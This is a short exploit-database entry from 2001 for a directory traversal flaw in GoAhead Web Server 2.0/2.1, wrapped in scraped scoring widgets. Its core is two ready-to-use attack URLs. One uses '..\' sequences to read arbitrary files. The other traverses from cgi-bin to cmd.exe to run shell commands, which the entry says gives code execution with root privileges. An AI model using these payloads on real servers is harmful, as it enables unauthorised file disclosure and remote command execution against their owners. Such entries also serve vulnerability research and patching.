Lucene search

K
exploitdbSergey NenashevEDB-ID:20607
HistoryFeb 02, 2001 - 12:00 a.m.

GoAhead Web Server 2.0/2.1 - Directory Traversal

2001-02-0200:00:00
Sergey Nenashev
www.exploit-db.com
12

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

source: https://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

Gaining access to a known file:

http://target/..\..\..\..\..\..\filename

Executing arbitrary commands:

http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\ 

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%